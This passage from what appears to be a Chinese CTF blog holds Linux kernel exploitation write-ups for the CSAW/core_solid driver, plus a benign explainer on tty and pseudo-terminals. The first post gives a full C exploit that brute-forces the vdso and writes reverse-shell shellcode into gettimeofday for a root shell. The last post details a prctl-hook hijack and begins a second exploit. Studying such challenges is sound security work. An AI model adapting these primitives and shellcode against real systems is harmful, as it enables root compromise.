    RAA(fd,channel_id,read_buff,addr,0x1000);
    if (!strcmp(read_buff+offset,"gettimeofday")) {
        fprintf(stderr,"%p found it?\n", addr);
        vdso_addr = addr;
        break;
    }
}

PS：能劫持 vdso 的核心就是 vdso 在内核状态下是可写的，高版本内核就不可写了

如果爆破出了 VDSO 的内核地址，就使用 GDB 把 VDSO 给 dump 下来，然后拖入 IDA 寻找函数 gettimeofday 的偏移（在 get_gettimeofday_str_offset 中查找的是 gettimeofday 字符串偏移）

1	vdso_addr in kernel: 0xffff880001e04000

1	pwndbg> dump memory ./vdso.so 0xffff880001e04000 0xffff880001e05000

写入的 Shellcode 是一个反弹 shell，它将 root shell 反弹到本地端口3333，我们只需 nc 本地端口3333即可

如果有 root 权限的程序，调用我们的 shellcode，那么我们的 shellcode 也是以 root 权限执行
在 Linux 中，crontab 是带有 root 权限的，并且它会不断的调用 vdso 里的 gettimeofday 函数
在 qemu 里，使用了一个程序来模拟（本题目是 /sbin/init）

完整 exp 如下：

#include<stdio.h>
#include<stdlib.h>
#include<inttypes.h>
#include<sys/types.h>
#include <fcntl.h>
#include <sys/ioctl.h>
#include <sys/prctl.h>
#include <unistd.h>
#include <sys/auxv.h>
#include <string.h>
#include <stdbool.h>

#define CSAW_IOCTL_BASE     0x77617363
#define CSAW_ALLOC_CHANNEL  CSAW_IOCTL_BASE+1
#define CSAW_OPEN_CHANNEL   CSAW_IOCTL_BASE+2
#define CSAW_GROW_CHANNEL   CSAW_IOCTL_BASE+3
#define CSAW_SHRINK_CHANNEL CSAW_IOCTL_BASE+4
#define CSAW_READ_CHANNEL   CSAW_IOCTL_BASE+5
#define CSAW_WRITE_CHANNEL  CSAW_IOCTL_BASE+6
#define CSAW_SEEK_CHANNEL   CSAW_IOCTL_BASE+7
#define CSAW_CLOSE_CHANNEL  CSAW_IOCTL_BASE+8

void die(const char* msg)
{
    perror(msg);
    exit(-1);
}

struct alloc_channel_args {
    size_t buf_size;
    int id;
};

struct open_channel_args {
    int id;
};

struct grow_channel_args {
    int id;
    size_t size;
};

struct shrink_channel_args {
    int id;
    size_t size;
};

struct read_channel_args {
    int id;
    char *buf;
    size_t count;
};

struct write_channel_args {
    int id;
    char *buf;
    size_t count;
};

struct seek_channel_args {
    int id;
    loff_t index;
    int whence;
};

struct close_channel_args {
    int id;
};

int get_gettimeofday_str_offset() {
    size_t vdso_addr = getauxval(AT_SYSINFO_EHDR);
    char* name = "gettimeofday";
    if (!vdso_addr){
        printf("error get name's offset");
        return 0;
    }
    else{
        printf("vdso_addr in user: 0x%lx\n",vdso_addr);
    }
    size_t name_addr = memmem(vdso_addr, 0x1000, name, strlen(name));
    if (name_addr < 0) {
        printf("error get name's offset");
        return 0;
    }

    return name_addr - vdso_addr;
}

void RAA(int fd, int channel_id, void *read_buff, uint64_t addr, uint32_t len)
{
    struct seek_channel_args seek_channel;
    struct read_channel_args read_channel;
    
    seek_channel.id = channel_id;
    seek_channel.index = addr-0x10;
    seek_channel.whence = SEEK_SET;
    ioctl(fd, CSAW_SEEK_CHANNEL, &seek_channel);

    read_channel.id = channel_id;
    read_channel.buf = (char*)read_buff;
    read_channel.count = len;
    ioctl(fd, CSAW_READ_CHANNEL, &read_channel);

    return;
}

void WAA(int fd, int channel_id, void* write_buff, uint64_t addr, uint32_t len)
{
    struct seek_channel_args seek_channel;
    struct write_channel_args write_channel;
    uint32_t i;
    for (i=0; i<len; i++){
        seek_channel.id = channel_id;
        seek_channel.index = addr-0x10+i;
        seek_channel.whence = SEEK_SET;
        ioctl(fd, CSAW_SEEK_CHANNEL, &seek_channel);

        write_channel.id = channel_id;
        write_channel.buf = (char*)write_buff+i;
        write_channel.count = 1;
        ioctl(fd, CSAW_WRITE_CHANNEL, &write_channel);
    }
    return;
}

int main()
{
    char name[20];
    struct alloc_channel_args channel_alloc;
    struct shrink_channel_args channel_shrink;
    int channel_id;
    char * read_buff = NULL;
    size_t vdso_addr = -1;
    char shellcode[]="\x90\x53\x48\x31\xc0\xb0\x66\x0f\x05\x48\x31\xdb\x48\x39\xc3\x75\x0f\x48\x31\xc0\xb0\x39\x0f\x05\x48\x31\xdb\x48\x39\xd8\x74\x09\x5b\x48\x31\xc0\xb0\x60\x0f\x05\xc3\x48\x31\xd2\x6a\x01\x5e\x6a\x02\x5f\x6a\x29\x58\x0f\x05\x48\x97\x50\x48\xb9\xfd\xff\xf2\xfa\x80\xff\xff\xfe\x48\xf7\xd1\x51\x48\x89\xe6\x6a\x10\x5a\x6a\x2a\x58\x0f\x05\x48\x31\xdb\x48\x39\xd8\x74\x07\x48\x31\xc0\xb0\xe7\x0f\x05\x90\x6a\x03\x5e\x6a\x21\x58\x48\xff\xce\x0f\x05\x75\xf6\x48\xbb\xd0\x9d\x96\x91\xd0\x8c\x97\xff\x48\xf7\xd3\x53\x48\x89\xe7\x50\x57\x48\x89\xe6\x48\x31\xd2\xb0\x3b\x0f\x05\x48\x31\xc0\xb0\xe7\x0f\x05";

    int fd = open("/dev/csaw",O_RDWR);
    if(fd < 0){
        die("open error");
    }

    read_buff = (char*)malloc(0x1000);

    channel_alloc.buf_size = 0x100;
    channel_alloc.id = -1;
    ioctl(fd,CSAW_ALLOC_CHANNEL,&channel_alloc);
    if(channel_alloc.id == -1){
        die("alloc channel wrong");
    }
    else{
        printf("alloc channel id is :%d\n",channel_alloc.id);
    }

    channel_id = channel_alloc.id;
    channel_shrink.id = 1;
    channel_shrink.size = 0x101;
    ioctl(fd,CSAW_SHRINK_CHANNEL,&channel_shrink);

    int offset = get_gettimeofday_str_offset();
    printf("%lx\n",offset);
    for (uint64_t addr = 0xffff880000000000; addr<0xffffc80000000000; addr+=0x1000) {
        RAA(fd,channel_id,read_buff,addr,0x1000);
        if (!strcmp(read_buff+offset,"gettimeofday")) {
            fprintf(stderr,"%p found it?\n", addr);
            vdso_addr = addr;
            break;
        }
    }

    if(vdso_addr == -1){
        die("not find vdso");
    }
    else{
        printf("vdso_addr in kernel: 0x%lx\n",vdso_addr);
    }

    size_t gettimeofday = vdso_addr + 0xcb0;
    WAA(fd,channel_id,shellcode,gettimeofday,strlen(shellcode));

    sleep(1);
    printf("open a shell\n");
    system("nc -lvnp 3333");
}

小结：

尝试了一下 “cred attack” 和 “vdso attack”

本来还想试试 “HijackPrctl”，但在 qwb2018-solid_core 中已经复现过了

Linux tty 简析

Posted on 2022-10-07 In Knowledge 7.5k 7 mins.

tty_struct attack

当用户打开 ptmx 驱动时 open("/dev/ptmx", O_RDWR) ，会分配一个 tty_struct 结构，它的结构如下：

struct tty_struct {
	int	magic;
	struct kref kref;
	struct device *dev;
	struct tty_driver *driver;
	const struct tty_operations *ops;
	int index;

	/* Protects ldisc changes: Lock tty not pty */
	struct ld_semaphore ldisc_sem;
	struct tty_ldisc *ldisc;

	struct mutex atomic_write_lock;
	struct mutex legacy_mutex;
	struct mutex throttle_mutex;
	struct rw_semaphore termios_rwsem;
	struct mutex winsize_mutex;
	spinlock_t ctrl_lock;
	spinlock_t flow_lock;
	/* Termios values are protected by the termios rwsem */
	struct ktermios termios, termios_locked;
	struct termiox *termiox;	/* May be NULL for unsupported */
	char name[64];
	struct pid *pgrp;		/* Protected by ctrl lock */
	struct pid *session;
	unsigned long flags;
	int count;
	struct winsize winsize;		/* winsize_mutex */
	unsigned long stopped:1,	/* flow_lock */
		      flow_stopped:1,
		      unused:BITS_PER_LONG - 2;
	int hw_stopped;
	unsigned long ctrl_status:8,	/* ctrl_lock */
		      packet:1,
		      unused_ctrl:BITS_PER_LONG - 9;
	unsigned int receive_room;	/* Bytes free for queue */
	int flow_change;

	struct tty_struct *link;
	struct fasync_struct *fasync;
	wait_queue_head_t write_wait;
	wait_queue_head_t read_wait;
	struct work_struct hangup_work;
	void *disc_data;
	void *driver_data;
	spinlock_t files_lock;		/* protects tty_files list */
	struct list_head tty_files;

#define N_TTY_BUF_SIZE 4096

	int closing;
	unsigned char *write_buf;
	int write_cnt;
	/* If the tty has a pending do_SAK, queue it here - akpm */
	struct work_struct SAK_work;
	struct tty_port *port;
} __randomize_layout;

其中有一个 struct tty_operations 指针，而 tty_operations 结构体里是一些列对驱动操作的函数指针：

struct tty_operations {
	struct tty_struct * (*lookup)(struct tty_driver *driver,
			struct file *filp, int idx);
	int  (*install)(struct tty_driver *driver, struct tty_struct *tty);
	void (*remove)(struct tty_driver *driver, struct tty_struct *tty);
	int  (*open)(struct tty_struct * tty, struct file * filp);
	void (*close)(struct tty_struct * tty, struct file * filp);
	void (*shutdown)(struct tty_struct *tty);
	void (*cleanup)(struct tty_struct *tty);
	int  (*write)(struct tty_struct * tty,
		      const unsigned char *buf, int count);
	int  (*put_char)(struct tty_struct *tty, unsigned char ch);
	void (*flush_chars)(struct tty_struct *tty);
	int  (*write_room)(struct tty_struct *tty);
	int  (*chars_in_buffer)(struct tty_struct *tty);
	int  (*ioctl)(struct tty_struct *tty,
		    unsigned int cmd, unsigned long arg);
	long (*compat_ioctl)(struct tty_struct *tty,
			     unsigned int cmd, unsigned long arg);
	void (*set_termios)(struct tty_struct *tty, struct ktermios * old);
	void (*throttle)(struct tty_struct * tty);
	void (*unthrottle)(struct tty_struct * tty);
	void (*stop)(struct tty_struct *tty);
	void (*start)(struct tty_struct *tty);
	void (*hangup)(struct tty_struct *tty);
	int (*break_ctl)(struct tty_struct *tty, int state);
	void (*flush_buffer)(struct tty_struct *tty);
	void (*set_ldisc)(struct tty_struct *tty);
	void (*wait_until_sent)(struct tty_struct *tty, int timeout);
	void (*send_xchar)(struct tty_struct *tty, char ch);
	int (*tiocmget)(struct tty_struct *tty);
	int (*tiocmset)(struct tty_struct *tty,
			unsigned int set, unsigned int clear);
	int (*resize)(struct tty_struct *tty, struct winsize *ws);
	int (*set_termiox)(struct tty_struct *tty, struct termiox *tnew);
	int (*get_icount)(struct tty_struct *tty,
				struct serial_icounter_struct *icount);
	int  (*get_serial)(struct tty_struct *tty, struct serial_struct *p);
	int  (*set_serial)(struct tty_struct *tty, struct serial_struct *p);
	void (*show_fdinfo)(struct tty_struct *tty, struct seq_file *m);
#ifdef CONFIG_CONSOLE_POLL
	int (*poll_init)(struct tty_driver *driver, int line, char *options);
	int (*poll_get_char)(struct tty_driver *driver, int line);
	void (*poll_put_char)(struct tty_driver *driver, int line, char ch);
#endif
	int (*proc_show)(struct seq_file *, void *);
} __randomize_layout;

tty_struct 结构体的大小为 0x2E0，在 kernel pwn 中，如果可以有 kmalloc-1k 我们就会考虑进行 tty_struct attack（劫持 tty_operations，控制执行流）

内核的利用并不是本篇文章的重点，接下来我们将关注 tty 本身在内核中的作用

仿真终端

tty 其实是 “电传打字机(Teletypewriter)” 的缩写（后来这种设备逐渐键盘和显示器取代），泛指计算机的终端（terminal）设备

在 Linux 或 UNIX 中，tty 变为了一个抽象设备（用于表示各种类型的终端设备）：
- 有时它指的是一个物理输入设备（例如串口）
- 有时它指的是一个允许用户和系统交互的“虚拟仿真终端设备”

现代物理 IO 设备都采用“键盘+显示器”：

如果用户态程序要把内容输出到显示器，只要把这些内容写入到显示器对应的 tty 设备就可以了，然后由 tty 层负责匹配合适的驱动完成输出，这也是 Linux 控制台的工作原理：

显示器和键盘这类物理设备会被抽象为驱动 driver
而终端仿真程序 Terminal Emulator（虚拟终端）使用驱动接口完成进一步的抽象
本质上来讲键盘输入的字符是没有意义的，而终端仿真程序会对这些字符进行“格式化”，“适配”和“解释”，这个过程被称为行规程 Line Discipline
经过行规程的数据将会通过 tty 和用户层进行交互，同时返回输出数据
返回的数据也要经过行规程，然后被“翻译”为显示器驱动可以理解的形式并输出

在 Linux 中可以直接查看 tty 层的设备：

➜  ~ ls /dev/tty*
/dev/tty    /dev/tty23  /dev/tty39  /dev/tty54      /dev/ttyS10  /dev/ttyS26
/dev/tty0   /dev/tty24  /dev/tty4   /dev/tty55      /dev/ttyS11  /dev/ttyS27
/dev/tty1   /dev/tty25  /dev/tty40  /dev/tty56      /dev/ttyS12  /dev/ttyS28
/dev/tty10  /dev/tty26  /dev/tty41  /dev/tty57      /dev/ttyS13  /dev/ttyS29
/dev/tty11  /dev/tty27  /dev/tty42  /dev/tty58      /dev/ttyS14  /dev/ttyS3
/dev/tty12  /dev/tty28  /dev/tty43  /dev/tty59      /dev/ttyS15  /dev/ttyS30
/dev/tty13  /dev/tty29  /dev/tty44  /dev/tty6       /dev/ttyS16  /dev/ttyS31
/dev/tty14  /dev/tty3   /dev/tty45  /dev/tty60      /dev/ttyS17  /dev/ttyS4
/dev/tty15  /dev/tty30  /dev/tty46  /dev/tty61      /dev/ttyS18  /dev/ttyS5
/dev/tty16  /dev/tty31  /dev/tty47  /dev/tty62      /dev/ttyS19  /dev/ttyS6
/dev/tty17  /dev/tty32  /dev/tty48  /dev/tty63      /dev/ttyS2   /dev/ttyS7
/dev/tty18  /dev/tty33  /dev/tty49  /dev/tty7       /dev/ttyS20  /dev/ttyS8
/dev/tty19  /dev/tty34  /dev/tty5   /dev/tty8       /dev/ttyS21  /dev/ttyS9
/dev/tty2   /dev/tty35  /dev/tty50  /dev/tty9       /dev/ttyS22
/dev/tty20  /dev/tty36  /dev/tty51  /dev/ttyprintk  /dev/ttyS23
/dev/tty21  /dev/tty37  /dev/tty52  /dev/ttyS0      /dev/ttyS24
/dev/tty22  /dev/tty38  /dev/tty53  /dev/ttyS1      /dev/ttyS25

/dev/tty：（控制终端）
- 代表当前 tty 设备
- 在当前的终端中输入 echo hello > /dev/tty ，都会直接显示在当前的终端中
/dev/tty1 ~ /dev/tty6：（虚拟终端）
- 用于表示运行在内核态的软件仿真终端
- 可以把这些 tty 设备理解为对虚拟终端的一种抽象，使得用户程序能以操控文件的形式来与虚拟终端交互
/dev/tty0：（虚拟终端）
- 代表当前虚拟终端
- /dev/tty 主要是针对进程来说的，而 /dev/tty0 是针对整个系统来说的（所以 /dev/tty0 拥有更高的权限）
/dev/tty7 ~ /dev/tty63：（其他终端）
- 用于表示运行在内核态的其他终端
- 这些 tty 是由其他的关键软件使用的（例如 Ubuntu 中 /dev/tty7 就是图形显示管理器）
/dev/ttyS0 ~ /dev/ttyS31：（串行端口终端）
- 是使用计算机串行端口连接的终端设备

我们可以做一个实验来感受一下 /dev/tty1 ~ /dev/tty6：

先在当前终端中输入 Ctrl + Alt + F4 切换到 /dev/tty4

上图显示的就是一个虚拟终端 Terminal Emulator，用户态的 Shell 运行在它上面
输入 Ctrl + Alt + F2 切换到桌面环境，输入 sudo echo "hello" > /dev/tty4，然后返回 /dev/tty4

通过操作 /dev/tty4 文件，可以把用户态程序输入的内容输出到对应的虚拟终端上

可以认为 tty 是虚拟终端的一个抽象层：

tty 给用户态程序 Shell 提供了一种抽象，使其能够以操作文件的形式来控制各种终端

但是 tty 是运行在内核态中的，为了便于将终端仿真移入用户空间，同时仍保持 tty 子系统的完整，伪终端被发明了出来（被称为 pseudo-TTY，简称 pty）

每当你在系统中启动一个终端仿真器或使用任何类型的 shell 时，它都会与 pty 进行交互
当创建一个伪终端时，会在 /dev/pts 目录下创建一个设备文件（用于关联 pty）

➜  ~ ls -l /dev/pts 
总用量 0
crw--w---- 1 yhellow tty  136, 0 10月  7 20:24 0
crw--w---- 1 yhellow tty  136, 1 10月  7 20:24 1
crw--w---- 1 yhellow tty  136, 2 10月  7 20:41 2
c--------- 1 root    root   5, 2 10月  7 19:14 ptmx

➜  ~ lsof /dev/ptmx
COMMAND    PID    USER   FD   TYPE DEVICE SIZE/OFF NODE NAME
gnome-ter 4015 yhellow   19u   CHR    5,2      0t0   87 /dev/ptmx
gnome-ter 4015 yhellow   20u   CHR    5,2      0t0   87 /dev/ptmx
gnome-ter 4015 yhellow   21u   CHR    5,2      0t0   87 /dev/ptmx

你可以在终端仿真器中输入 tty 来找到相关联的 pty：

1 2	➜ ~ tty /dev/pts/0

伪终端

伪终端（被称为 pseudo-tty，简称 pty）是指伪终端 master 和伪终端 slave 这一对字符设备，其中的 slave 对应 /dev/pts/ 目录下的一个文件，而 master 则在内存中标识为一个文件描述符(fd)：

master 端 - ptm：是更接近用户显示器、键盘的一端（基于 VFS 的特殊文件）
slave 端 - pts：是在虚拟终端上运行的 CLI（Command Line Interface，命令行接口）程序

伪终端本质上是运行在用户态的终端模拟器创建的一对字符设备：

/dev/ptmx 是一个字符设备文件，当进程打开 /dev/ptmx 文件时，进程会同时获得：
- 一个指向 pseudoterminal master(ptm) 的文件描述符
- 一个在 /dev/pts 目录中创建的 pseudoterminal slave(pts) 设备
建了一个伪终端对，并让 shell 运行在 slave 端：
- 当用户在终端模拟器中按下键盘按键时，它产生字节流并写入 master 中，shell 便可从 master 中读取输入（以读文件的形式）
- 然后 shell 和它的子程序将输出内容写入 slave 中，由 CLI 程序进行显示

可以认为 pty 是一种轻量级的虚拟终端：

是一些软件（如 ssh、screen、xterm 等）模拟的 Terminal Emulator
在 Linux 中右键打开的终端就是 pty

伪终端的运用

Telnet 和 SSH 都运用了伪终端技术（主要是远程登录部分）：

每次用户通过客户端连接服务端的时候，服务端创建一个伪终端 master、slave 字符设备对
在 slave 端运行 login 程序，将 master 端的输入输出通过网络传送至客户端
客户端则将从网络收到的信息直接关联到键盘/显示器上

网络通信的方式还是依靠 NC 底层的 socket（TCP 协议发包）
将 socket 生成的 socketFD 重定位为 master 端的“标准输入”（把管道的 stdin 重定位为 socketFD，再把管道的 stdout 重定位为 master）
使 master 端和 socketFD 共用一个命名管道（命名管道相当于两个文件，一个用来读，一个用来写，它们底层使用同一个 inode 所以数据共享）
最后把 login 的 stdin stdout stderr 重定位到 slave 上

HijackPrctl+kernel_base爆破

Posted on 2022-10-05 In Reappearance 13k 12 mins.

core_solid 复现

qemu-system-x86_64 \
-m 256M \
-kernel ./bzImage \
-initrd  ./rootfs.cpio \
-append "root=/dev/ram rw console=ttyS0 oops=panic panic=1  kaslr" \
-cpu qemu64,+smep,+smap \
-netdev user,id=t0, -device e1000,netdev=t0,id=nic0 \
-s \
-nographic  -enable-kvm \

kaslr，smep，smap

#!/bin/sh
mount -t proc proc /proc
mount -t sysfs sysfs /sys
mount -t devtmpfs none /dev
/sbin/mdev -s
mkdir -p /dev/pts
mount -vt devpts -o gid=4,mode=620 none /dev/pts
chmod 666 /dev/ptmx
echo 1 > /proc/sys/kernel/kptr_restrict
echo 1 > /proc/sys/kernel/dmesg_restrict
ifconfig lo 127.0.0.1 netmask 255.255.255.0
route add -net 127.0.0.0 netmask 255.255.255.0 lo
echo "flag{hijack_prctl_is_fun_and_function_pointer_is_dangerous}" > /flag
chmod 400 /flag
insmod /simp1e.ko
chmod 777 /proc/simp1e


setsid /bin/cttyhack setuidgid 1000 /bin/sh
echo 'sh end!\n'
#poweroff -d 1800000 -f &
umount /proc
umount /sys

poweroff -d 0  -f

kptr_restrict，dmesg_restrict

漏洞分析

驱动程序的逆向有点麻烦，主要是 csaw_ioctl 不同功能传入的结构体不同

3个8字节，有时是指针，有时是 size，甚至有时只传入4字节

而函数 csaw_ioctl 中只定义了一个结构体 channel_args_from，于是我就默认每个位置的功能固定，走了不少弯路，最后是通过函数名和一些特殊函数分析出了 channel_args_from 各个位置的含义：

alloc_new_ipc_channel /* 因为里面有kmalloc,可以判断传入的参数为size */
realloc_ipc_channel /* 传入的参数为ID */
get_channel_by_id /* 传入的参数为ID */
mutex_lock /* 传入的参数为mutex */

顺带一提，以下两个结构体在驱动模块中经常出现（部分条目可能不一样）

00000000 list struc ; (sizeof=0x28, mappedto_4)
00000000 item dq ?                               ; offset
00000008 mutex dq ?                              ; offset
00000010 field_10 dq ?
00000018 field_18 dq ?
00000020 field_20 dq ?
00000028 list ends

00000000 item struc ; (sizeof=0x20, mappedto_5)
00000000 refcount dd ?
00000004 index dd ?
00000008 buf dq ?                                ; offset
00000010 size dq ?
00000018 data dq ?                               ; offset
00000020 item ends

程序的漏洞点就在 realloc_ipc_channel 中：

if ( key_cannel )
    size = channel->size + user_size;
else
    size = channel->size - user_size; /* 负数溢出 */
buf = (char *)krealloc(channel->buf, size + 1, 0x14000C0LL);
if ( buf )
{
    item->buf = buf; 
    item->size = size; /* 为item赋值新的size */
    err = _InterlockedDecrement(&item->refcount);
    key = err == 0;
    if ( err < 0 )
        __asm { ud0 }
    if ( key )
    {
        ipc_channel_destroy(item);
        LODWORD(channel) = 0;
    }
    else
    {
        LODWORD(channel) = 0;
    }
}

如果 user_size 大于 channel->size 就会导致负数溢出
但这里我们想要的不是 krealloc 申请的大空间，而是 channel->buf 空间不变，但是 item->size 超大，可以绕过后面的检查：

item_write = using_list->item;
size = channel_from.size;
if ( !using_list->item )
    goto LABEL_39;
data_write = item_write->data;
if ( (unsigned __int64)&data_write[channel_from.size] > item_write->size )
    /* item_write->size非常大,实现局部任意写 */
    goto LABEL_25;
addr = (unsigned __int64)&item_write->buf[(unsigned __int64)data_write];
if ( addr <= 0xFFFFFFFF7FFFFFFFLL )
    /* 程序进行了限制,写的范围必须大于0xFFFFFFFF7FFFFFFF */
    printk("16Access Denied\n");

else if ( strncpy_from_user(addr, channel_from.user_ptr, channel_from.size) >= 0 )
    /* 把用户指针user_ptr中的数据拷贝到using_list->item->data中 */
    goto LABEL_19;

程序将在 CSAW_WRITE_CHANNEL 完成局部任意写

任意读写

程序利用 CSAW_SEEK_CHANNEL 和 CSAW_READ_CHANNEL 可以完成局部任意读：

1	item_seek->data = channel_from.user_ptr;

1
2
3

item_read = using_list->item;
data_read = (unsigned __int64)item_read->data;
copy_to_user(channel_from.user_ptr, &item_read->buf[data_read], channel_from.size)

item_seek 和 item_read 都指向 using_list->item（是由 alloc_new_ipc_channel 进行分配的）
因此 data_read == channel_from.user_ptr

模板如下：

void RAA(int fd, int channel_id, void *read_buff, uint64_t addr, uint32_t len)
{
    struct seek_channel_args seek_channel;
    struct read_channel_args read_channel;

    seek_channel.id = channel_id;
    seek_channel.index = addr-0x10;
    seek_channel.whence = SEEK_SET;
    ioctl(fd, CSAW_SEEK_CHANNEL, &seek_channel);

    read_channel.id = channel_id;
    read_channel.buf = (char*)read_buff;
    read_channel.count = len;
    ioctl(fd, CSAW_READ_CHANNEL, &read_channel);
}

程序利用 CSAW_SEEK_CHANNEL 和 CSAW_WRITE_CHANNEL 可以完成局部任意写：

1	item_seek->data = channel_from.user_ptr;

1
2
3

data_write = (unsigned __int64)item_write->data;
addr = (unsigned __int64)&item_write->buf[data_write];
strncpy_from_user(addr, channel_from.user_ptr, channel_from.size)

首先 data_write == channel_from.user_ptr
而 item_write->buf 是由 _kmalloc 申请出来的，理论上来说我们是不好泄露堆地址的，但是 realloc_ipc_channel 中有解决的办法：

buf = (char *)krealloc(channel->buf, size + 1, 0x14000C0LL);
if ( buf )
{
    item->buf = buf; 
    ......
}

当 size+1 == 0 时，krealloc 会返回 NULL，同时被赋值给 using_list->item->buf（这就不需要考虑堆地址了）

模板如下：

void WAA(int fd, int channel_id, void* write_buff, uint64_t addr, uint32_t len)
{
    struct seek_channel_args seek_channel;
    struct write_channel_args write_channel;
	
    seek_channel.id = channel_id;
    seek_channel.index = addr-0x10;
    seek_channel.whence = SEEK_SET;
    ioctl(fd, CSAW_SEEK_CHANNEL, &seek_channel);

    write_channel.id = channel_id;
    write_channel.buf = (char*)write_buff;
    write_channel.count = len;
    ioctl(fd, CSAW_WRITE_CHANNEL, &write_channel);  
}

入侵思路

可以用 HijackPrctl 在不提权的情况下获取 flag

HijackPrctl 的核心就是利用 prctl 系统调用：

SYSCALL_DEFINE5(prctl, int, option, unsigned long, arg2, unsigned long, arg3,
		unsigned long, arg4, unsigned long, arg5)
{
	struct task_struct *me = current;
	unsigned char comm[sizeof(me->comm)];
	long error;

	error = security_task_prctl(option, arg2, arg3, arg4, arg5);
	if (error != -ENOSYS)
		return error;
    ......
}

然后跟进 security_task_prctl

int security_task_prctl(int option, unsigned long arg2, unsigned long arg3,
			 unsigned long arg4, unsigned long arg5)
{
	int thisrc;
	int rc = -ENOSYS;
	struct security_hook_list *hp;

	hlist_for_each_entry(hp, &security_hook_heads.task_prctl, list) {
		thisrc = hp->hook.task_prctl(option, arg2, arg3, arg4, arg5);
		if (thisrc != -ENOSYS) {
			rc = thisrc;
			if (thisrc != 0)
				break;
		}
	}
	return rc;
}

在 security_task_prctl 中会定位到一个虚表里面去，并且第一个参数可控
劫持这里，然后调用 prctl，就可以实现任意代码执行

利用程序漏洞实现的 WAA 可以轻松覆盖这里，但是有一个问题：

1 2	int security_task_prctl(int option, unsigned long arg2, unsigned long arg3, unsigned long arg4, unsigned long arg5)

security_task_prctl 的第一个参数是 int 类型
为了执行 commit_creds(prepare_kernel_cred(0))，我们需要传入 prepare_kernel_cred(0) 的指针，但是在64位的系统中该指针会被 int 类型截断（32位就没有这个困扰）

取而代之的是函数 __orderly_poweroff：

static int __orderly_poweroff(bool force)
{
	int ret;

	ret = run_cmd(poweroff_cmd);

	if (ret && force) {
		pr_warn("Failed to start orderly shutdown: forcing the issue\n");
		emergency_sync();
		kernel_power_off();
	}

	return ret;
}

该函数会调用 run_cmd，进而调用 call_usermoderhelper（内核运行用户程序的一个 api，并且拥有 Root 的权限，如果我们能够控制性的调用它，就能以 Root 权限执行我们想要执行的程序）
参数 poweroff_cmd 是全局变量，可以修改

因此 HijackPrctl 的大体步骤为：

篡改 poweroff_cmd 使其等于我们预期执行的命令
篡改 prctl_hook 为 orderly_poweroff
调用 prctl

为此我们需要先泄露 kernel_base：

当我们有 RAA 任意读后，可以用爆破的形式泄露 VDSO 的 ELF 头文件
然后利用 VDSO和 kernel_base 相差不远的特性，泄露出内核基址

把网上的模板拿来改一改就好了：

for(addr=0xffffffff80000000; addr<0xffffffffffffefff; addr+=0x1000) {
    RAA(fd, channel_id, &read_buff, addr, 8);
    if (read_buff == 0x010102464c457f) { /* VDSO ELF头文件标志 */
        printf("find it: %p\n",addr);
        vdso_addr = addr;
        break;
    }
}

接下来就是一些套路化的东西，但是这个消息获取的过程需要注意

信息获取

先关闭 kaslr，开始调试内核：

/ # cat /proc/kallsyms
0000000000000000 A irq_stack_union 
0000000000000000 A __per_cpu_start
ffffffffa3a00000 T startup_64
ffffffffa3a00000 T _stext
ffffffffa3a00000 T _text
ffffffffa3a00030 T secondary_startup

kernel_base == 0xffffffffa3a00000

/ # grep security_task_prctl /proc/kallsyms
ffffffffa3cbd410 T security_task_prctl
/ # grep poweroff_work_func /proc/kallsyms
ffffffffa3a9c4c0 t poweroff_work_func

poweroff_work_func == 0xffffffffa3a9c4c0
poweroff_work_func_offset = 0xffffffffa3a9c4c0 - 0xffffffffa3a00000 = 0x9c4c0

然后连接 GDB，打印 security_task_prctl-ffffffffa3cbd410

pwndbg> x /30iw 0xffffffffa3cbd410
   0xffffffffa3cbd410:	push   r15
   0xffffffffa3cbd412:	mov    r15d,0xffffffda
   0xffffffffa3cbd418:	push   r14
   0xffffffffa3cbd41a:	mov    r14d,edi
   0xffffffffa3cbd41d:	push   r13
   0xffffffffa3cbd41f:	mov    r13,rsi
   0xffffffffa3cbd422:	push   r12
   0xffffffffa3cbd424:	mov    r12,rdx
   0xffffffffa3cbd427:	push   rbp
   0xffffffffa3cbd428:	mov    rbp,rcx
   0xffffffffa3cbd42b:	push   rbx
   0xffffffffa3cbd42c:	sub    rsp,0x8
   0xffffffffa3cbd430:	mov    rbx,QWORD PTR [rip+0x14a4cc9]        # 0xffffffffa5162100
   0xffffffffa3cbd437:	mov    QWORD PTR [rsp],r8
   0xffffffffa3cbd43b:	cmp    rbx,0xffffffffa5162100
   0xffffffffa3cbd442:	je     0xffffffffa3cbd46f
   0xffffffffa3cbd444:	mov    r8,QWORD PTR [rsp]
   0xffffffffa3cbd448:	mov    rcx,rbp
   0xffffffffa3cbd44b:	mov    rdx,r12
   0xffffffffa3cbd44e:	mov    rsi,r13
   0xffffffffa3cbd451:	mov    edi,r14d
   0xffffffffa3cbd454:	call   QWORD PTR [rbx+0x18] /* target */

在 0xffffffffa3cbd454 打断点，调试至此：

*RBX  0xffffffffa4c4fce8 —▸ 0xffffffffa5162100 ◂— 0xffffffffa4c4fce8
*RIP  0xffffffffa3cbd454 ◂— call   qword ptr [rbx + 0x18]
─────────────────────────────────────────────
 ► 0xffffffffa3cbd454    call   qword ptr [rbx + 0x18]        <0xffffffffa3a9c4c0>

prctl_hook == 0xffffffffa4c4fd00
prctl_hook_offset = 0xffffffffa4c4fd00 - 0xffffffffa3a00000 = 0x124fd00

然后连接 GDB，打印 poweroff_work_func-ffffffffa3a9c4c0

pwndbg> x /30iw 0xffffffffa3a9c4c0
   0xffffffffa3a9c4c0:	push   rbx
   0xffffffffa3a9c4c1:	mov    rdi,0xffffffffa4c3d1e0
   0xffffffffa3a9c4c8:	movzx  ebx,BYTE PTR [rip+0x1670401]        # 0xffffffffa510c8d0
   0xffffffffa3a9c4cf:	call   0xffffffffa3a9c050 /* 调用run_cmd */

第一个 call 就会调用 run_cmd，所以第一个参数 poweroff_cmd == rdi
poweroff_cmd_offset = 0xffffffffa4c3d1e0 - 0xffffffffa3a00000 = 0x123d1e0

完整 exp：

#include<stdio.h>
#include<stdlib.h>
#include<inttypes.h>
#include<sys/types.h>
#include<fcntl.h>
#include<sys/ioctl.h>
#include<sys/prctl.h>
#include<unistd.h>
#include<sys/auxv.h>
#include<string.h>
#include<stdbool.h>

#define CSAW_IOCTL_BASE     0x77617363
#define CSAW_ALLOC_CHANNEL  CSAW_IOCTL_BASE+1
#define CSAW_OPEN_CHANNEL   CSAW_IOCTL_BASE+2
#define CSAW_GROW_CHANNEL   CSAW_IOCTL_BASE+3
#define CSAW_SHRINK_CHANNEL CSAW_IOCTL_BASE+4
#define CSAW_READ_CHANNEL   CSAW_IOCTL_BASE+5
